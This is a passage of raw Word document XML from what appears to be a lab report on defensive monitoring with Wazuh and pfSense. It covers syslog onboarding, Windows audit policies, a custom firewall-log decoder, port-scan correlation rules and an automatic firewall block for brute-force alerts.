      <w:r>
        <w:t xml:space="preserve">Added custom decoders (local_decoder.xml) for pfSense filterlog format - default Wazuh decoder does not match logs missing 'pfSense' hostname prefix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added custom rules (local_rules.xml): rule 100300 (individual pfSense drop) and rule 100301 (correlation - 8+ drops in 60s from same source = port scan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configured Active Response: netsh command targeting rules 60204 and 60205, location=local (executes on the agent that generated the alert)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 pfSense-HQ Modifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled remote syslog logging (Status -&gt; System Logs -&gt; Settings)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remote log server: 10.10.20.20:514 (Wazuh manager)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Source Address: OPT1 (HQ-SERVERS subnet interface) to ensure logs source from routable subnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enabled Firewall Events in Remote Syslog Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added firewall rule: PASS 10.10.10.59 -&gt; 10.10.20.0/24 any protocol (allows HQ-STAFF domain traffic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added firewall rule: BLOCK 10.10.10.0/24 -&gt; 10.10.20.0/24 any protocol (blocks all other staff-to-servers traffic)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Detection Engineering Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 VirusTotal Threat Intelligence Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh's VirusTotal integration was configured to enrich File Integrity Monitoring (syscheck) alerts by submitting file hashes for reputation lookup. When syscheck detects a file creation or modification, the file's SHA-256 hash is queried against VirusTotal; if the hash matches known malicious samples, a high-severity alert (rule 87105) is generated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validation Test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The EICAR test file (a universally-detected benign test string) was downloaded to HQ-STAFF-01. Within seconds, Wazuh's syscheck detected the file creation, submitted the hash to VirusTotal, and generated rule 87105 alerts stating '60 engines detected...' - confirming the integration was operational end-to-end.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Windows Audit Policy Enablement (Critical Foundation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An early Month 2 discovery: Windows Security Event Log on HQ-STAFF-01 was empty despite the Wazuh agent being active. Root cause: 'Audit Logon Events' subcategory was set to 'No Auditing' by default. This is a silent failure - Wazuh receives no data because Windows generates no events. Similar issue found on DC1 for Kerberos subcategories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh cannot detect what Windows does not log. The following audit policies were enabled and are prerequisites for the rest of Month 2's detection use cases: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400"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Subcategory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="1F3864" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">HQ-STAFF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">HQ-STAFF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">HQ-STAFF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberos Authentication Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberos Service Ticket Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Logon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">DC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4200"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Success and Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Wazuh Agent Configuration - Security Channel Addition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HQ-STAFF-01's Wazuh agent ossec.conf was missing the localfile entry for the Windows 'Security' event channel. Sysmon events were being forwarded but authentication events were not. The following block was added to /Program Files (x86)/ossec-agent/ossec.conf on HQ-STAFF-01:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;localfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;location&gt;Security&lt;/location&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;log_format&gt;eventchannel&lt;/log_format&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/localfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After adding this and restarting WazuhSvc, 4625 events immediately began flowing to Wazuh - unblocking Use Case 1 and Use Case 2 detection.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 pfSense Syslog Onboarding - Custom Decoder Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pfSense syslog forwarding to Wazuh was configured. Verification via tcpdump confirmed packets arriving at Wazuh:514. However, no alerts were generated - Wazuh's default pfSense decoder expects the hostname 'pfSense' immediately before 'filterlog' in the syslog message, but the incoming messages had the format:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Jul 10 19:27:45 filterlog[24205]: 4,,,1000000103,em1,match,block,...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A custom decoder was developed and placed in /var/ossec/etc/decoders/local_decoder.xml:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;decoder name="pf-custom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;prematch&gt;filterlog&lt;/prematch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/decoder&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;decoder name="pf-custom-fields"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;parent&gt;pf-custom&lt;/parent&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;regex offset="after_parent" type="pcre2"&gt;\[\d+\]:\s+(\d+),,,\d+,\w+,\w+,(\w+),\w+,\d+,\w+,,\d+,\d+,\d+,\w+,\d+,(\w+),\d+,(\d+\.\d+\.\d+\.\d+),(\d+\.\d+\.\d+\.\d+),(\d+),(\d+)&lt;/regex&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;order&gt;id,action,protocol,srcip,dstip,srcport,dstport&lt;/order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/decoder&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two custom rules were added in local_rules.xml to build detection on top of the decoded events:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 100300 (Level 3) - fires on every decoded pfSense firewall drop, extracting srcip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rule 100301 (Level 10) - correlation rule using same_srcip, fires when 8+ drops occur from the same source IP within 60 seconds - the port scan detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The decoder was validated using wazuh-logtest, which confirmed Phase 2 (decoding) extracted all fields correctly and Phase 3 (rule matching) triggered rule 100300 as expected.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 Active Response Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh Active Response was configured to automatically block attacking IP addresses via Windows Firewall. The configuration in /var/ossec/etc/ossec.conf on the Wazuh manager:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;active-response&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;command&gt;netsh&lt;/command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;location&gt;local&lt;/location&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;rules_id&gt;60204,60205&lt;/rules_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;timeout&gt;180&lt;/timeout&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/active-response&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key configuration points:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">location=local means the netsh command executes on the Wazuh agent that generated the alert - the attacked machine itself, not the manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rules_id includes both 60204 (NTLM brute force correlation) and 60205 (Kerberos brute force correlation) - covers both authentication protocols</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">timeout=180 means the firewall block expires after 3 minutes - a lab tradeoff to allow re-testing; production should use permanent blocks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
